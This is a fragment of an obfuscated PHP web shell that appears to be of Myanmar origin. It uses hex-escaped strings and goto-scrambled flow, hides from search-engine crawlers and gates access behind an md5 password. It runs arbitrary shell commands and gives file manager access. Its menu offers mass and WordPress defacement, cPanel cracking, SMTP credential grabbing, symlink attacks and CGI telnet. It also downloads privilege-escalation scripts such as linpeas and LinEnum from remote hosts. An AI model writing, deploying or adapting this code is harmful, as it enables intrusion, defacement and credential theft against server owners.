"\101\x41\x41\x41\x41\103\110\65\x42\x41\105\x41\x41\x41\x67\x41\x4c\101\101\x41\101\x41\101\124\x41\102\x41\x41\101\101\122\x52\x45\x4d\154\x4a\161\x37\x30\64\66\x79\160\66\102\x78\x73\x69\110\x45\126\102\x45\101\113\x59\x43\x55\x50\162\104\160\67\110\154\x58\122\144\105\x6f\x4d\x71\103\x65\142\160" . "\x2f\x34\131\143\150\x66\146\x7a\107\121\150\x48\x34\131\122\x59\x50\102\x32\x44\117\154\110\120\x69\113\x77\x71\144\61\120\161\x38\x79\x72\x56\126\x67\x33\121\x59\145\x48\x35\122\x59\113\x35\x72\112\x66\141\x46\x55\x55\101\63\166\102\x34\x66\x42\111\x42\x41\x44\x73\75\47\x3e{$href}\74\x2f\164\144\76"; echo "\x3c\164\x64\40\143\154\x61\x73\x73\75\x27\x74\144\x5f\150\x6f\155\x65\47\76\x3c\143\145\156\164\x65\x72\76{$dtype}\74\57\x63\145\156\164\145\x72\x3e\x3c\57\x74\x64\76"; echo "\x3c\x74\144\x20\x63\x6c\x61\x73\x73\75\47\164\144\137\150\x6f\x6d\145\47\76\x3c\143\145\156\x74\x65\162\76\55\74\57\143\145\156\x74\x65\x72\x3e\74\x2f\x74\x68\76"; echo "\74\164\x64\x20\x63\x6c\141\x73\163\75\47\164\x64\x5f\x68\x6f\155\145\47\76\74\143\x65\x6e\x74\x65\162\x3e{$dtime}\x3c\57\x63\145\x6e\x74\145\x72\x3e\x3c\x2f\164\x64\x3e"; echo "\x3c\164\144\40\x63\x6c\x61\x73\x73\75\47\164\x64\137\150\x6f\155\x65\47\x3e\x3c\x63\x65\156\164\145\162\76" . w("{$dir}\x2f{$dirx}", perms("{$dir}\57{$dirx}")) . "\74\57\x63\x65\x6e\x74\x65\x72\x3e\74\x2f\x74\x64\x3e"; echo "\x3c\164\x64\x20\x63\154\x61\x73\163\75\x27\x74\x64\x5f\150\157\155\145\47\x20\x73\164\x79\154\145\x3d\47\160\x61\144\x64\x69\156\147\55\x6c\x65\146\x74\72\x20\61\x35\160\170\73\47\x3e{$act_dir}\74\57\164\144\x3e"; } echo "\x3c\x2f\164\x72\76"; foreach ($scandir as $file) { $ftype = filetype("{$dir}\x2f{$file}"); $ftime = date("\106\40\x64\x20\131\40\x67\72\x69\x3a\163", filemtime("{$dir}\57{$file}")); $size = filesize("{$dir}\x2f{$file}") / 1024; $size = round($size, 3); if ($size > 1024) { $size = round($size / 1024, 2) . "\x4d\x42"; } else { $size = $size . "\113\x42"; } if (!is_file("{$dir}\x2f{$file}")) { continue; } echo "\74\164\x72\76"; echo "\x3c\164\144\x20\143\154\141\163\x73\75\47\164\144\137\150\157\x6d\x65\x27\76\74\x69\x6d\147\x20\163\162\143\x3d\47\x64\141\x74\x61\72\151\x6d\141\147\145\57\160\156\147\x3b\142\x61\x73\x65\x36\x34\x2c\151\126\102\117\x52\x77\60\113\107\147\157\101\x41\101\101\x4e\123\125\x68\x45\125\147\x41\101\x41\102\x41\101\x41\x41\101\121\x43\101\x59\x41\101\101\x41\146\70\x2f\71\150\101\x41\101\x41\x41\130\116\123\x52\60\x49\101\162\x73\x34\143\x36\121\101\x41\x41\101\132\x69\123\60\144\x45\101\x50\x38\101\57\167\104\x2f\157\114\62\x6e\x6b\x77\x41\101\101\x41\154\x77\123\106\x6c\x7a\101\x41\101\x4c\x45\167\x41\x41\103\170\x4d\x42\101\x4a\x71\x63\x47\101\x41\101\x41\x41\x64\60\x53\x55\x31\x46\102\x39\157\x4a\x42\150\x63\124\112\x76\62\x42\62\144\64\x41\x41\x41\112\115\x53\125\x52\102\x56\104\152\114\x62\132\117\71\x54\150\170\132\x45\x49\x57\x2f\x71\154\166\144\x74\115\x33\x38\x42\x4e\147\x4a\x51\x6d\x51\x67\112\x47\144\x2b\101\x2f\115\x51\x42\x4c\167\107\x6a\x69\x77\110\63\156\167\144\153\123\x4c\164\x4f\x32\x78\x45\122\x47\x35\114\x71\x78\x58\122\123\111\x52\x32\x59\x44\x66\x44\x34\x47\x6b\x47\x4d\60\x50\63\162\x62\64\x62\x39\x50\101\x7a\x30\154\x37\x70\123\154\127\x6c\127\x30\146\156\156\114\x6f\x6c\x41\x49\120\102\64\x50\130\150\x34\x65\106\x75\156\165\143\x41\111\111\114\x77\144\x45\x53\145\x5a\x79\101\151\x66\x6e\160\x36\53\x75\x39\x6f\116\x4c\x6f\x33\147\115\x33\116\172\124\144\x48\x52\x2b\x2f\x2f\172\x76\112\115\x7a\x53\x79\112\113\x4b\157\x64\x69\x49\147\70\101\x58\141\x78\145\111\172\61\x62\104\132\x37\x4d\170\x71\116\x66\x74\147\x53\x55\122\x44\x57\x79\x37\114\x55\x6e\x5a\x30\x64\131\x6d\170\x41\106\x41\x56\x45\154\x49\x36\101\105\x43\x79\x67\x49\x73\121\x51\x73\151\172\114\x42\x4f\101\x42\101\x44\117\x6a\113\101\x70\161\x68\x37\x75\x37\x47\157\x43\125\127\151\x77\x59\x62\145\x74\157\125\110\x72\162\x50\x63\x77\x43\x71\157\x46\x32\113\125\145\x58\114\172\105\x7a\x42\x76\60\x2b\165\121\155\x53\x48\x4d\x45\x5a\71\x46\x36\x53\x5a\x63\162\x36\151\64\111\x73\x42\117\x61\x2f\x62\x37\110\x51\115\x61\110\164\x49\x41\167\x67\x4c\144\110\141\x6c\104\101\x31\145\166\60\145\121\142\123\152\x72\x45\162\121\x77\112\x70\x71\106\64\145\x41\170\x2f\x68\x6f\x71\104\x31\63\62\x6d\x4d\153\112\162\151\65\165\x53\x4f\154\106\150\x45\x68\160\x55\x51\x49\x69\x6f\x6a\167\x61\155\x4f\104\x4e\x73\154\152\146\125\x57\103\161\x70\114\x6e\117\141\141\103\123\113\112\x74\156\141\102\x43\x73\132\x59\152\x41\x6c\x6c\x6d\x58\111\x34\166\141\145\x6f\x61\126\130\60\143\x62\x53\144\x68\155\125\x52\x33\172\x41\x4b\166\116\x6a\x59\x36\126\x69\x6f\x6f\x30\x74\x57\x7a\147\105\157\x6e\x4b\x62\x57\53\113\153\x47\127\164\63\x55\x6e\x74\x30\103\145\107\x66\x4a\x73\71\147\53\x55\125\60\162\x45\x47\x48\110\57\110\167\57\115\x6a\x48\x36\57\x54\53\x50\117\x64\x46\157\x52\116\113\x43\150\x4d\62\62\170\155\x4f\120\x65\x73\x70\152\120\107\121\x36\x48\x70\x4e\121\x32\x37\164\x36\163\101\103\x44\123\x4e\x61\x6e\x79\x6f\x6c\x6a\104\x4c\x45\x64\126\141\x46\117\x4c\145\70\x5a\153\x55\x6a\x4b\x35\165\x6b\x71\x33\164\67\x39\154\x50\103\x37\x2f\x4f\104\x6b\65\107\x61\x2b\x59\66\x4f\65\x4d\161\171\x6d\x4e\x77\63\x56\61\171\63\x68\171\x7a\146\130\x30\x68\x71\166\112\x4c\171\142\x58\x46\144\x2b\x2b\x66\62\144\63\x64\60\144\155\163\x2b\161\x76\x67\64\117\104\x7a\x38\146\110\x78\60\57\x4c\x73\142\x65\63\71\66\64\163\123\x37\x2b\64\165\105\152\x75\156\160\x71\155\123\145\x36\145\63\104\63\x4e\x35\57\116\x30\x57\132\x62\164\x6c\x79\x39\x66\60\x39\156\132\x32\132\57\142\x32\x39\x76\62\x66\x4c\105\145\x76\166\113\x39\x71\x76\67\x63\62\164\157\x4b\x69\70\x55\151\151\121\x69\161\x48\142\x6d\x36\162\x69\127\66\x61\61\63\x66\x6e\53\172\166\x37\63\x2b\x6f\161\x6f\162\150\x63\114\147\x4b\x55\x46\130\126\x50\53\x66\x6e\x35\x32\53\114\157\156\x6a\x38\111\114\112\x30\120\x38\x5a\111\x43\x43\106\x39\x2f\x50\124\x70\103\154\150\160\x42\166\147\120\145\x6c\x6f\114\71\125\65\x35\116\x49\x41\x41\101\x41\x41\x41\123\125\126\x4f\122\113\x35\x43\131\x49\111\x3d\x27\x3e\74\x61\x20\150\x72\145\x66\75\x27\77\141\x63\x74\75\x76\x69\145\x77\46\x64\151\162\x3d{$dir}\x26\146\x69\x6c\145\75{$dir}\57{$file}\x27\76{$file}\x3c\x2f\141\x3e\x3c\57\164\x64\x3e"; echo "\x3c\164\x64\x20\x63\x6c\141\163\x73\75\47\x74\144\137\x68\157\155\x65\47\76\x3c\x63\145\156\x74\145\x72\x3e{$ftype}\x3c\57\143\145\x6e\x74\145\x72\76\74\x2f\x74\x64\x3e"; echo "\x3c\164\144\40\143\x6c\141\x73\163\75\x27\x74\x64\137\150\x6f\x6d\145\47\x3e\74\x63\145\156\x74\145\x72\76{$size}\x3c\x2f\143\145\156\164\x65\x72\76\74\x2f\164\144\76"; echo "\74\x74\x64\40\x63\x6c\141\163\x73\x3d\47\164\144\x5f\x68\157\155\x65\47\76\74\x63\145\156\164\145\x72\x3e{$ftime}\74\57\143\145\x6e\164\145\x72\76\74\x2f\x74\144\76"; echo "\74\164\144\40\x63\x6c\141\163\x73\x3d\47\164\144\137\x68\x6f\155\x65\47\x3e\74\143\x65\156\x74\145\x72\76" . w("{$dir}\x2f{$file}", perms("{$dir}\57{$file}")) . "\x3c\x2f\143\x65\x6e\x74\145\162\x3e\74\57\164\144\x3e"; echo "\74\164\x64\x20\143\154\x61\163\x73\75\x27\x74\x64\137\x68\x6f\155\145\47\x20\163\164\x79\x6c\x65\x3d\x27\x70\141\x64\144\151\x6e\x67\x2d\154\145\x66\164\x3a\40\x31\65\160\x78\73\47\x3e\74\x61\x20\150\162\145\146\75\x27\77\141\x63\x74\x3d\x65\144\x69\164\x26\144\151\162\x3d{$dir}\46\146\x69\154\x65\75{$dir}\57{$file}\x27\76\x65\144\151\164\x3c\57\141\76\x20\x7c\x20\74\x61\x20\150\x72\145\x66\x3d\x27\x3f\x61\x63\x74\75\162\x65\156\141\x6d\x65\46\144\151\162\x3d{$dir}\x26\146\x69\154\x65\x3d{$dir}\57{$file}\x27\x3e\x72\x65\x6e\x61\x6d\145\74\57\141\76\x20\174\x20\74\x61\40\150\x72\x65\x66\75\x27\77\141\x63\164\x3d\x64\145\x6c\145\x74\x65\x26\x64\x69\x72\75{$dir}\x26\146\151\x6c\145\x3d{$dir}\57{$file}\47\x3e\144\x65\154\145\164\x65\x3c\57\141\76\40\174\x20\74\141\x20\150\162\x65\146\x3d\47\x3f\x61\143\x74\75\x64\x6f\x77\156\x6c\x6f\x61\144\46\x64\151\162\x3d{$dir}\x26\x66\151\x6c\x65\x3d{$dir}\x2f{$file}\x27\x3e\144\x6f\x77\x6e\154\157\141\x64\x3c\x2f\x61\76\x3c\x2f\164\144\76"; } echo "\74\57\164\162\76\74\x2f\x74\141\142\x6c\145\76"; } else { echo "\74\146\157\156\x74\40\x63\157\x6c\x6f\x72\75\x72\x65\x64\76\143\141\156\47\164\x20\157\160\145\156\x20\x64\151\162\145\143\x74\157\162\171\x3c\x2f\x66\157\x6e\164\x3e"; } } goto FbEMB; ozjW3: echo "\74\x6c\x69\76\x5b\40\74\141\40\150\162\x65\x66\x3d\x27\x3f\144\151\162\75{$dir}\46\x64\x6f\x3d\141\165\x74\x6f\137\x64\x77\x70\x27\x3e\x57\157\162\144\120\162\x65\163\x73\40\101\x75\164\x6f\x20\x44\145\x66\141\143\145\x3c\x2f\x61\x3e\40\135\x3c\x2f\154\x69\76"; goto oa5vY; oN4Wq: echo "\x3c\x6c\x69\x3e\133\x20\74\141\40\150\x72\x65\x66\x3d\47\77\x64\x69\162\x3d{$dir}\x26\144\157\x3d\x73\x68\x65\x6c\x6c\x63\150\153\x27\76\x53\150\x65\154\154\x20\103\150\145\x63\153\x65\x72\x3c\x2f\141\76\x20\x5d\x3c\x2f\154\151\x3e"; goto Knirt; fx5k6: @ini_set("\x6d\x61\x78\x5f\x65\170\x65\x63\165\x74\x69\x6f\156\x5f\x74\151\x6d\x65", 0); goto p3bLB; CI5k9: foreach ($scdir as $c_dir => $cdir) { echo "\74\141\40\x68\x72\x65\146\75\47\77\144\x69\162\75"; for ($i = 0; $i <= $c_dir; $i++) { echo $scdir[$i]; if ($i != $c_dir) { echo "\57"; } } echo "\x27\76{$cdir}\74\x2f\x61\x3e\x2f"; } goto i0ZTx; cIIZt: echo "\x3c\x6c\x69\76\133\40\74\x61\40\150\x72\145\146\x3d\x27\x3f\144\x69\162\75{$dir}\46\144\x6f\75\x75\x70\x6c\157\141\144\47\76\x55\160\154\x6f\x61\144\x3c\57\x61\x3e\x20\x5d\x3c\x2f\154\151\x3e"; goto fnUh4; bi8zb: if (!function_exists("\160\157\x73\x69\170\x5f\x67\145\x74\145\x67\151\x64")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\x3f"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["\156\141\x6d\x65"]; $uid = $uid["\x75\x69\144"]; $group = $gid["\x6e\141\155\x65"]; $gid = $gid["\x67\151\x64"]; } goto KSQHh; Jg1Vp: echo "\74\x74\x72\x3e\74\164\x64\76\x55\163\145\162\x3a\x20\74\x66\x6f\x6e\164\x20\x63\x6f\x6c\x6f\x72\75\154\151\155\x65\x3e" . $user . "\74\57\146\x6f\156\164\x3e\40\x28" . $uid . "\x29\x20\x47\162\157\x75\160\72\40\x3c\x66\x6f\x6e\x74\40\x63\157\x6c\x6f\x72\x3d\154\x69\155\145\76" . $group . "\74\57\x66\x6f\x6e\164\76\x20\50" . $gid . "\x29\74\x2f\164\x64\x3e\74\x2f\164\x72\x3e"; goto mKYab; KpDSL: CreateTools("\x4c\x69\x6e\x45\156\x75", "\150\x74\x74\160\x73\72\x2f\57\162\141\x77\x2e\147\151\x74\150\x75\142\x75\x73\x65\162\143\x6f\x6e\x74\x65\156\164\x2e\x63\x6f\x6d\57\x72\x65\x62\x6f\x6f\164\x75\x73\x65\x72\57\x4c\x69\156\x45\x6e\165\155\x2f\x6d\141\163\164\x65\162\57\x4c\151\156\x45\156\x75\155\x2e\x73\x68"); goto JOCoy; NeUvg: $auth_pass = "\67\143\x66\x62\x33\x62\x66\x35\x33\141\x34\144\x35\70\66\x64\x33\67\x32\x31\x34\63\x33\70\66\63\67\70\63\x38\62\x35"; goto nIl58; dprgE: echo "\x3c\154\x69\76\133\x20\x3c\x61\40\150\x72\x65\x66\x3d\47\77\144\151\162\75{$dir}\46\144\x6f\75\x63\160\141\156\x65\x6c\x27\x3e\103\120\x61\156\145\x6c\40\103\x72\141\143\153\x3c\x2f\141\x3e\x20\135\x3c\57\154\x69\76"; goto FhERQ; XP6Ww: @set_magic_quotes_runtime(0); goto hy4jF; jH7rn: echo "\74\x6c\x69\x3e\133\x20\74\x61\40\x68\162\x65\x66\x3d\47\77\144\151\x72\x3d{$dir}\46\144\x6f\75\155\x61\x73\x73\x5f\x64\145\x66\x61\x63\145\47\x3e\x4d\x61\x73\163\40\104\145\146\x61\143\145\x3c\57\141\76\x20\135\74\x2f\x6c\151\76"; goto I5Yfd; tKZOx: $show_ds = !empty($ds) ? "\74\146\x6f\156\x74\x20\143\x6f\154\157\162\x3d\162\145\x64\x3e{$ds}\74\x2f\146\x6f\x6e\x74\x3e" : "\74\146\157\156\x74\x20\143\157\x6c\157\162\75\154\151\155\145\76\116\117\x4e\105\74\x2f\x66\x6f\x6e\164\x3e"; goto bi8zb; s0LnO: @ini_set("\x6c\x6f\147\x5f\x65\x72\162\157\x72\163", 0); goto fx5k6; D_0ZZ: echo "\74\164\162\76\x3c\x74\x64\x3e\120\x6f\x72\164\x20\72\74\146\157\x6e\x74\40\x63\x6f\154\157\162\x3d\154\x69\155\145\76\x20\x20{$sport}\74\57\x66\157\156\x74\x3e\x20\x3c\x2f\x74\x64\76\x3c\x2f\x74\162\76"; goto CDb2j; FlmmB: $perl = exe("\160\x65\162\x6c\x20\x2d\55\150\145\x6c\160") ? "\74\146\157\156\x74\40\x63\x6f\154\x6f\x72\75\154\151\x6d\145\x3e\x4f\x4e\74\x2f\x66\x6f\x6e\x74\76" : "\x3c\146\x6f\x6e\164\x20\143\157\x6c\x6f\162\x3d\162\145\x64\x3e\117\x46\x46\x3c\57\146\x6f\156\164\76"; goto Q3IR8; yKdsw: function CreateTools($names, $lokasi) { if ($_GET["\x63\162\145\141\x74\145"] == $names) { $a = '' . $_SERVER["\123\105\122\126\x45\122\137\x4e\x41\115\105"] . ''; $b = dirname($_SERVER["\120\x48\x50\x5f\x53\x45\114\106"]); $c = "\x2f\x65\156\165\137\163\x63\x72\151\160\x74\57" . $names . "\x2e\163\x68"; if (file_exists("\x65\156\165\137\163\x63\162\151\x70\164\57" . $names . "\56\163\150")) { echo "\74\163\x63\162\151\x70\164\x20\164\171\x70\145\x3d\x22\x74\145\170\164\57\x6a\141\x76\x61\x73\143\x72\x69\x70\x74\x22\x3e\141\154\145\162\164\50\x22\x44\x6f\x6e\x65\42\51\73\167\x69\156\144\x6f\167\56\x6c\x6f\x63\x61\164\151\157\156\56\150\162\145\x66\40\75\40\42\145\156\x75\137\163\143\162\151\x70\x74\57" . $names . "\56\163\150\x22\x3b\x3c\57\163\143\x72\151\160\164\76\40"; } else { mkdir("\145\x6e\x75\x5f\163\143\162\x69\160\164", 511); file_put_contents("\x65\x6e\165\x5f\163\143\x72\x69\160\x74\x2f" . $names . "\56\163\150", file_get_contents($lokasi)); echo "\40\x3c\163\143\x72\151\160\x74\40\164\171\x70\x65\75\x22\164\x65\170\x74\57\x6a\x61\166\141\x73\143\162\151\x70\164\x22\x3e\141\x6c\x65\x72\164\x28\x22\x44\x6f\156\x65\x2c\x20\163\143\x72\x69\x70\x74\40\x61\162\x65\40\x69\x6e\40\57\145\156\165\x5f\163\x63\162\151\x70\x74\x20\144\162\151\x65\x20\x3a\x33\42\51\73\167\151\156\x64\157\x77\x2e\154\157\x63\x61\x74\151\x6f\x6e\56\x68\162\x65\146\40\x3d\x20\42\x65\x6e\x75\x5f\163\x63\162\151\160\164\x2f" . $names . "\56\x73\150\x22\73\x3c\x2f\x73\x63\162\151\160\164\76\x20"; } } } goto fYm5d; b0T7h: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\x73"; } elseif (($perms & 40960) == 40960) { $info = "\154"; } elseif (($perms & 32768) == 32768) { $info = "\55"; } elseif (($perms & 24576) == 24576) { $info = "\x62"; } elseif (($perms & 16384) == 16384) { $info = "\x64"; } elseif (($perms & 8192) == 8192) { $info = "\143"; } elseif (($perms & 4096) == 4096) { $info = "\160"; } else { $info = "\165"; } $info .= $perms & 256 ? "\162" : "\x2d"; $info .= $perms & 128 ? "\x77" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\170" : ($perms & 2048 ? "\x53" : "\55"); $info .= $perms & 32 ? "\x72" : "\x2d"; $info .= $perms & 16 ? "\167" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\x78" : ($perms & 1024 ? "\123" : "\55"); $info .= $perms & 4 ? "\x72" : "\55"; $info .= $perms & 2 ? "\x77" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\x78" : ($perms & 512 ? "\124" : "\55"); return $info; } goto Lm7kd; qs3Cf: if (!empty($_SERVER["\x48\124\x54\120\137\x55\x53\105\x52\137\x41\107\105\116\x54"])) { $userAgents = array("\107\x6f\157\x67\154\145\x62\x6f\x74", "\x53\x6c\x75\x72\160", "\x4d\x53\x4e\102\157\x74", "\x50\x79\x63\125\122\x4c", "\x66\x61\x63\145\142\x6f\157\x6b\145\170\164\145\x72\156\141\154\x68\151\x74", "\x69\141\x5f\141\x72\x63\x68\x69\166\145\x72", "\x63\162\141\167\154\145\x72", "\131\x61\x6e\144\x65\170", "\x52\x61\155\x62\x6c\x65\162", "\x59\x61\150\x6f\x6f\41\40\x53\x6c\x75\x72\x70", "\131\x61\150\157\x6f\123\145\145\x6b\x65\162", "\142\x69\156\x67\x62\157\164"); if (preg_match("\57" . implode("\174", $userAgents) . "\57\x69", $_SERVER["\x48\x54\x54\x50\137\x55\x53\105\x52\x5f\101\x47\x45\116\x54"])) { header("\110\124\x54\x50\57\x31\x2e\60\x20\x34\x30\64\x20\x4e\x6f\x74\x20\106\157\x75\x6e\144"); die; } } goto G0DvU; oa5vY: echo "\74\154\x69\76\133\40\x3c\x61\40\x68\162\145\146\75\47\77\144\x69\x72\75{$dir}\46\x64\157\75\141\x75\164\157\137\144\x77\160\62\x27\x3e\127\157\x72\144\x50\162\x65\x73\163\x20\x41\x75\x74\157\40\104\145\146\x61\143\x65\x20\126\x2e\x32\x3c\57\x61\76\x20\x5d\74\57\154\151\x3e"; goto rf0wp; fnUh4: echo "\x3c\154\x69\x3e\133\x20\74\141\40\x68\x72\145\x66\x3d\x27\x3f\x64\x69\x72\x3d{$dir}\x26\x64\157\75\x63\155\x64\x27\x3e\103\157\x6d\x6d\x61\156\x64\74\x2f\x61\76\x20\x5d\x3c\x2f\x6c\x69\x3e"; goto jH7rn; J1fnQ: echo "\74\x75\154\76"; goto k9MqC; xQf2A: if (isset($_GET["\x66\151\x6c\x65"]) && $_GET["\x66\151\x6c\x65"] != '' && $_GET["\x61\x63\164"] == "\144\157\x77\x6e\x6c\x6f\x61\x64") { @ob_clean(); $file = $_GET["\x66\x69\x6c\145"]; header("\x43\157\x6e\x74\145\156\x74\x2d\x44\145\x73\143\162\151\x70\164\151\x6f\156\72\40\x46\x69\x6c\x65\x20\124\162\x61\156\x73\146\x65\162"); header("\x43\157\156\x74\x65\x6e\164\55\x54\171\160\145\72\40\141\160\160\x6c\x69\143\141\x74\151\157\156\x2f\157\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\155"); header("\x43\x6f\x6e\164\x65\x6e\x74\x2d\104\x69\163\x70\157\163\x69\x74\151\x6f\x6e\x3a\x20\141\164\164\x61\143\150\x6d\x65\156\164\x3b\x20\x66\x69\154\x65\x6e\x61\x6d\145\x3d\x22" . basename($file) . "\x22"); header("\105\170\160\x69\x72\x65\x73\x3a\x20\60"); header("\x43\x61\x63\150\145\55\x43\x6f\x6e\x74\162\x6f\154\72\40\x6d\165\x73\164\55\162\x65\166\x61\154\x69\144\141\164\145"); header("\x50\162\141\x67\155\x61\x3a\x20\x70\165\x62\x6c\x69\x63"); header("\103\x6f\156\x74\145\156\x74\x2d\x4c\145\156\147\x74\150\x3a\40" . filesize($file)); readfile($file); die; } goto fIVrs; hOAue: session_start(); goto E0dHZ; AjGjJ: echo "\x3c\164\162\x3e\74\164\144\x3e\103\165\162\x72\x65\156\x74\x20\104\111\122\72\40"; goto CI5k9; osRPZ: echo "\x3c\57\165\x6c\76"; goto zOQmB; lFDuc: $dir = str_replace("\x5c", "\57", $dir); goto YTSct; Bk7Av: set_time_limit(0); goto XP6Ww; Lm7kd: function hdd($s) { if ($s >= 1073741824) { return sprintf("\45\61\x2e\x32\x66", $s / 1073741824) . "\40\107\102"; } elseif ($s >= 1048576) { return sprintf("\45\61\x2e\x32\146", $s / 1048576) . "\x20\115\102"; } elseif ($s >= 1024) { return sprintf("\x25\x31\56\62\x66", $s / 1024) . "\x20\x4b\x42"; } else { return $s . "\x20\x42"; } } goto ZoXkF; RBPXg: echo "\74\x74\141\142\x6c\x65\x20\163\164\x79\x6c\145\75\47\x77\x69\144\164\x68\x3a\x31\60\60\x25\47\x3e"; goto SmpFc; B1szS: if ($d0mains) { $count; foreach ($d0mains as $d0main) { if (@ereg("\172\157\156\145", $d0main)) { preg_match_all("\43\x7a\157\156\145\40\x22\x28\56\52\51\42\43", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } } goto FpftJ; G0DvU: function login_shell() { ?>
<html><head><title>Sudo Family :: Myanmar youth hacker</title><style type="text/css">html{margin:20px auto;background:#000;color:green;text-align:center}header{color:green;margin:10px auto}input[type=password]{width:250px;height:25px;color:red;background:#fff;border:1px dotted green;padding:5px;margin-left:20px;text-align:center}</style></head><center><header><br><br><form method="post"><center><a href="https://freeimage.host/"><img alt="0ZZ5Rs.jpg"border="0"src="https://iili.io/0ZZ5Rs.jpg"></a><br><input name="pass"type="password"></form><?php die; } goto qS2hq; rhmdN: echo "\x3c\154\x69\x3e\133\40\74\x61\x20\x68\x72\145\x66\75\47\x3f\144\x69\x72\75{$dir}\x26\144\157\75\143\x67\x69\47\x3e\x43\107\111\40\x54\x65\x6c\156\145\164\74\57\141\76\x20\135\x3c\x2f\x6c\151\76\x3c\142\x72\76"; goto HnvhT; j4gEb: echo "\x3c\154\x69\x3e\x5b\40\x3c\141\x20\x68\162\x65\146\x3d\x27\x3f\144\151\x72\75{$dir}\46\144\x6f\75\x7a\151\x70\x27\76\132\x69\160\40\115\145\156\165\74\x2f\x61\x3e\40\x5d\x3c\x2f\154\x69\x3e"; goto RC49a; FhERQ: echo "\74\154\151\x3e\133\40\x3c\141\x20\150\162\x65\146\x3d\47\x3f\x64\x69\x72\x3d{$dir}\x26\144\x6f\75\163\155\164\x70\47\x3e\123\x4d\x54\x50\x20\x47\x72\141\142\142\x65\x72\74\57\x61\x3e\40\x5d\74\57\154\151\76"; goto eF3h9; ryNNe: echo "\74\x74\x72\76\x3c\x74\144\76\x44\x69\163\x61\x62\154\x65\40\x46\x75\x6e\143\164\151\157\x6e\163\x3a\x20{$show_ds}\74\x2f\164\144\x3e\x3c\x2f\164\162\76"; goto YWJkV; pPSA4: $wget = exe("\x77\147\145\x74\x20\55\55\150\x65\154\x70") ? "\74\x66\x6f\x6e\x74\x20\x63\x6f\154\157\162\75\154\x69\155\145\76\x4f\116\74\57\146\x6f\x6e\x74\76" : "\74\146\x6f\156\x74\x20\x63\157\x6c\x6f\x72\75\162\x65\144\76\117\x46\106\x3c\x2f\x66\x6f\x6e\164\76"; goto FlmmB; hu4Fd: $default_action = "\106\151\154\x65\x73\115\141\156"; goto ZsvGm; axCEd: @ini_set("\x65\162\x72\x6f\x72\137\x6c\x6f\x67", NULL); goto s0LnO; ZoXkF: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto Skaey; qS2hq: if (!isset($_SESSION[md5($_SERVER["\x48\x54\124\120\137\x48\x4f\x53\124"])])) { if (empty($auth_pass) || isset($_POST["\x70\x61\163\x73"]) && md5($_POST["\160\x61\163\x73"]) == $auth_pass) { $_SESSION[md5($_SERVER["\110\124\x54\x50\137\110\x4f\123\124"])] = true; } else { login_shell(); } } goto xQf2A; lDjYb: $default_charset = "\125\124\x46\x2d\x38"; goto qs3Cf; Tq01b: echo "\x3c\x6c\151\76\x5b\x20\x3c\141\40\x68\x72\x65\x66\75\47\x3f\x64\x69\162\x3d{$dir}\46\144\x6f\x3d\141\x75\164\157\137\167\x70\47\x3e\101\165\164\x6f\40\x45\x64\151\164\40\124\x69\x74\x6c\145\40\127\x6f\162\144\120\x72\145\163\x73\x3c\57\141\76\x20\x5d\74\x2f\x6c\151\x3e"; goto ozjW3; iHrZU: echo "\74\164\x72\76\74\x74\x64\76\127\x65\x62\163\151\164\x65\x73\40\72\x3c\146\x6f\156\x74\40\x63\x6f\x6c\x6f\162\75\x6c\x69\x6d\145\76\x20{$count}\40\74\57\146\x6f\156\x74\76\x20\x44\157\155\141\151\156\163\74\x2f\x74\144\x3e\74\x2f\164\x72\x3e"; goto D_0ZZ; SLvTF: function exe($cmd) { if (function_exists("\x73\x79\x73\164\145\x6d")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\145\x78\x65\x63")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("\x70\141\163\x73\x74\150\162\165")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\x73\x68\x65\154\154\137\x65\x78\145\x63")) { $buff = @shell_exec($cmd); return $buff; } } goto b0T7h; sSbF1: CreateTools("\x62\x61\x73\150\141\x72\153", "\150\164\x74\x70\x73\x3a\x2f\57\x72\x61\x77\x2e\x67\x69\164\x68\x75\142\165\163\145\162\x63\157\x6e\164\145\x6e\x74\x2e\143\x6f\155\x2f\162\x65\x64\143\x6f\144\145\55\x6c\141\x62\163\x2f\x42\141\163\150\141\x72\153\57\x6d\141\x73\x74\x65\162\57\x62\141\x73\150\141\x72\x6b\56\163\150"); goto X2ZwW; x0bfQ: echo "\x3c\x6c\x69\x3e\x5b\40\74\x61\x20\150\162\x65\146\x3d\47\77\x64\x69\162\75{$dir}\46\x64\x6f\75\x6d\x65\x74\165\x27\76\114\157\x67\x4f\x75\x74\x3c\57\141\x3e\x20\135\74\142\x72\x3e\74\x2f\x6c\x69\76"; goto osRPZ; UCGcg: CreateTools("\x70\145\x61\x73\163\55\156\x67", "\x68\x74\x74\x70\x73\72\x2f\57\x67\151\164\150\x75\142\x2e\x63\x6f\155\x2f\x63\x61\x72\154\x6f\x73\160\x6f\154\157\x70\57\x50\105\x41\123\x53\55\156\x67\x2f\162\x65\x6c\x65\x61\163\x65\x73\x2f\x6c\141\x74\x65\x73\164\57\x64\x6f\167\156\x6c\x6f\x61\144\57\x6c\x69\x6e\x70\x65\141\163\56\x73\x68"); goto ZDo2T; Dw0eC: echo "\74\154\151\76\133\40\x3c\141\40\150\x72\x65\146\x3d\x27\77\144\151\x72\x3d{$dir}\x26\x64\157\x3d\163\x79\155\x6c\x69\156\x6b\x27\76\123\171\155\x6c\x69\x6e\153\x3c\x2f\x61\76\40\x5d\74\142\x72\76\74\x2f\x6c\x69\76"; goto dprgE; fYm5d: CreateTools("\x6c\163\x65", 